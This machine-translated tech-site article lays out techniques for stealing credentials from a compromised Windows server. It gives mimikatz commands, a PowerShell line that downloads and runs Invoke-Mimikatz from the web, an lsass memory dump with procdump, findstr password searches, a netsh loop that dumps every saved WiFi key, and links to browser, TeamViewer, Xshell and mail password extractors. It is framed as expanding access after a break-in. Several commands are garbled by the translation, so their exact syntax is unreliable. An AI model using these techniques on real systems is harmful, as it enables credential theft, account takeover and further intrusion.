Shulou(Shulou.com)05/31 Report--

Windows login credential theft skills, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain in detail for you, people with this need can come to learn, I hope you can gain something.

Get the privileges of a Windows server and collect various login credentials in order to expand the results. Here are a few tools and techniques for stealing Windows login credentials.

1. Windows local password Hash

Windows's system password hash generally consists of two parts by default: the first part is LM-hash and the second part is NTLM-hash. Hash password format user name: RID:LM-HASH value: NT-HASH value under Windows system.

For example:

Administrator:500:AF01DF70036EBACFAAD3B435B51404EE:44F077E27F6FEF69E7BD834C7242B040 user name: Administrator RID: 500 LM- hash value: AF01DF70036EBACFAAD3B435B51404EE NT- hash value: 44F077E27F6FEF69E7BD834C7242B040

Cracking method 1: hash cracked the website online

Https://www.objectif-securite.ch/ophcrack http://cmd5.com

Cracking method 2: mimikatz

Github address:

Https://github.com/gentilkiwi/mimikatz

Mimikatz is also very easy to use, and it takes only two lines of command to extract the plaintext password of the Windows system:

Privilege::debug sekurlsa::logonpasswords

Cracking method 3: wce

The common parameters of wce are described as follows: parameter explanation:-l lists the login session and NTLM credentials (default)-s modifies the NTLM credential parameter of the current login session:-w caches a plaintext password through summary authentication

Cracking method 4: Powershell+mimikatz

Directly use poweshell to call mimikatz to grab the plaintext password in the system.

Powershell "IEX (New-Object Net.WebClient) .DownloadString ('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz-DumpCreds"

Cracking method 5: prodump+mimikatz

Procdump is a gadget officially provided by Microsoft. Microsoft's official download address is:

Https://technet.microsoft.com/en-us/sysinternals/dd996900# copies the tool to the target machine and executes the following command (administrator permission is required, and the version I choose is 64-bit) procdump.exe-accepteula-ma lsass.exe lsass.dmp # copies the generated memory dump file to the same directory as mimikatz, double-click to open mimikatz, as shown in figure: mimikatz # sekurlsa::minidump lsass.dmp # Switch to MINIDUMP mimikatz # sekurlsa::logonPasswords full

2. Grab the browser password

Many browsers provide the function of remembering passwords, and users will choose to remember passwords when logging on to some websites.

LaZagne: extract the password saved by the browser

Github project address:

Https://github.com/AlessandroZ/LaZagne

3. Plaintext storage password on the server

In some configuration files or logs, sensitive password information is recorded in plaintext, such as web.config, config.ini and other files. Sensitive directories can be searched manually or sensitive files and contents can be found through the findstr command.

Findstr / I / s "password" * .config findstr / I / s "password" * .ini findstr / I / s "password" * .xml

4. Third-party operation and maintenance tools managed password decryption

Common Linux operation and maintenance tools, such as Putty, xshell, winscp, RDP management tools, Remote Desktop Organizer, remote control software: Teamviewer and so on.

Xshell password decryption tool:

Https://github.com/dzxs/Xdecrypt

Extract session information saved by WinSCP,PuTTY, etc.:

Https://github.com/Arvanaghi/SessionGopher

Tools for extracting TeamViewer passwords from memory:

Https://github.com/attackercan/teamviewer-dumper

One click to crack the client asterisk password-asterisk password viewer.

5. Get the computer wifi password with one click

# View all wifi netsh wlan show profiles connected to the computer # check the wifi password netsh wlan show profiles name= "Aaron" key=clear # CMD to get all connected WIFI passwords for / f "skip=9 tokens=1,2 delims=:"% I in ('netsh wlan show profiles') do @ echo% j | findstr-I-v echo | netsh wlan show profiles% j key=clear

6. Windows keyboard recording tool

You can record the user's keyboard actions to capture the user's sensitive information, and this type of source code and tools can be found in both github and T00ls.

7. Collection of Windows password extraction tools

Password extraction tools for various Windows programs, including various browsers, mailboxes, Windows network passwords, wireless network keys, etc.

IE browser password extraction tool:

Https://www.nirsoft.net/toolsdownload/iepv.zip

Firefox browser password extraction tool:

Https://www.nirsoft.net/toolsdownload/passwordfox-x64.zip

Chrome browser password extraction tool:

Https://www.nirsoft.net/toolsdownload/chromepass.zip

SVN password decryptor:

Http://www.leapbeyond.com/ric/TSvnPD/TSvnPwd_source.zip

Mailbox password extraction tool:

Https://www.nirsoft.net/toolsdownload/mailpv.zip

Extract the password stored in the .rdp file:

Https://www.nirsoft.net/toolsdownload/rdpv.zip

MSSQL credential password acquisition tool:

Is it helpful for http://www.zcgonvh.com/zb_users/upload/2015/2/mssql_credentials_pwd.zip to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.